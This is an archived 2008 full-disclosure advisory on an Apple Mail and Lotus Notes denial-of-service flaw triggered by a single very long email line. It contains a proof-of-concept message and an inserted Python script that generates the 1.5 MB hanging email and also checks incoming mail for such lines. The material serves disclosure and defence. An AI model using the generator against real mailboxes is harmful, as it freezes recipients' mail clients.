Message-Id: <EB27A370-8013-4C37-AF64-709FEDE93D7B@davidwharton.us>
Date: Thu, 29 May 2008 19:31:39 -0500
From: David Wharton <security@...idwharton.us>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)
***Summary***
A maliciously crafted e-mail message can cause a denial of service in
multiple versions of the Apple Mail email client.
***Scope***
Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)
Note: other versions of this product may be vulnerable as well; I have
not tested them. The vendor has been made aware of this issue and has
chosen not to treat it as a security issue.
Interestingly enough, a similar issue seems to be present in multiple
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611).
The exploit provided in this advisory will also cause a denial of
service condition on multiple versions of IBM Lotus Notes. IBM has
been kind enough to create SPR# PRAD7DPKLW to address the issue the
exploit targets.
***Description***
An e-mail message with a maliciously crafted body (in my tests, a
single very long line) can cause the e-mail client to hang, resulting
in a denial of service condition. Testing with messages whose body
contains no newline characters (0x0A, 0x0D) or spaces (0x20) shows
that a single line of 1.5 MB can cause the e-mail clients to hang for
over half an hour.
Initial testing reveals the following:
In Apple Mail, the e-mail is rendered correctly in the preview pane
but a subsequent click on a different e-mail causes the application to
hang.
***Credits***
David Wharton
***References***
Apple Mail
http://www.apple.com/macosx/features/mail.html
***PoC Exploit***
Below is a sample e-mail with headers (some headers removed or
modified) that causes the e-mail clients to hang as discussed. The
body is quoted-printable encoded, so each trailing "=" is a soft line
break and is not part of the decoded content; once decoded, the body
is one long contiguous string of A's.
Subject: dos test
MIME-Version: 1.0
From: xxxxx@...xx.com
To: xxxxx@...xx.com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@...xx.com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@...xx.com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@
<font size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</font>N=
OTICE: This e-mail message and all attachments transmitted with it may con=
tain confidential information intended solely for the use of the addressee.=
<br />=
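The following Python script is an added example, not part of the advisory or the author's tooling. It covers both the Description and the PoC above: build_long_line_message() produces a text/html, quoted-printable message whose decoded body is one contiguous line of A's of any chosen length (the wire form gets the same "=" soft breaks shown in the PoC), and longest_unbroken_run() / exceeds_line_limit() implement the check a mail gateway or client developer would want, decoding each text part and measuring the longest run with no CR, LF or space. The function names, the example.invalid addresses, the output file name and the DEFAULT_LIMIT threshold are my assumptions; neither vendor publishes a limit.

```python
"""Build a single-long-line HTML e-mail of the shape shown in the advisory's
PoC, and screen a raw message for that shape by measuring its longest
decoded run with no newline or space.  Example code added here, not the
advisory author's tooling; names, addresses and the limit are assumptions."""
import email
import re
from email.message import EmailMessage
from email.policy import default

# Assumed threshold for the screening check; anything above it is treated as
# suspicious.  1.5 MB is the size the advisory reports as hanging the clients
# for over half an hour, but normal HTML mail never needs runs this long.
DEFAULT_LIMIT = 64 * 1024


def build_long_line_message(line_length,
                            sender="sender@example.invalid",
                            recipient="victim@example.invalid"):
    """Return the raw RFC 5322 bytes of a text/html message whose body is one
    run of line_length 'A's with no spaces or newlines, wrapped in the same
    <font> tag as the PoC.  The body is quoted-printable encoded, so on the
    wire it is many 76-byte lines ending in '=' (soft breaks) that decode to
    a single contiguous line, exactly as in the advisory."""
    msg = EmailMessage()
    msg["Subject"] = "dos test"
    msg["From"] = sender
    msg["To"] = recipient
    body = '<font size="2">' + "A" * line_length + "</font>"
    msg.set_content(body, subtype="html", charset="iso-8859-1",
                    cte="quoted-printable")
    return msg.as_bytes()


def longest_unbroken_run(raw_message):
    """Parse raw_message, decode every text/* part (undoing quoted-printable
    or base64), and return the length in bytes of the longest run that
    contains no CR (0x0D), LF (0x0A) or space (0x20)."""
    msg = email.message_from_bytes(raw_message, policy=default)
    longest = 0
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        for run in re.split(rb"[\r\n ]+", payload):
            if len(run) > longest:
                longest = len(run)
    return longest


def exceeds_line_limit(raw_message, limit=DEFAULT_LIMIT):
    """True if any decoded text part carries a run longer than limit bytes:
    the condition a gateway or client could use to reject, truncate or wrap
    the message before it reaches a renderer that hangs on long lines."""
    return longest_unbroken_run(raw_message) > limit


if __name__ == "__main__":
    # Reproduce the 1.5 MB case from the advisory and write it out as .eml
    # for delivery to a test mailbox (file name is an assumption).
    poc = build_long_line_message(1_500_000)
    with open("dos-test.eml", "wb") as fh:
        fh.write(poc)
    print("wrote dos-test.eml; longest decoded run =",
          longest_unbroken_run(poc))
```

Running the script writes dos-test.eml with the 1.5 MB line; feed it to a test mailbox over SMTP or import it directly. The check measures the decoded body rather than the raw lines on purpose: counting wire lines would miss this message entirely, since quoted-printable keeps every wire line at 76 bytes.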
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/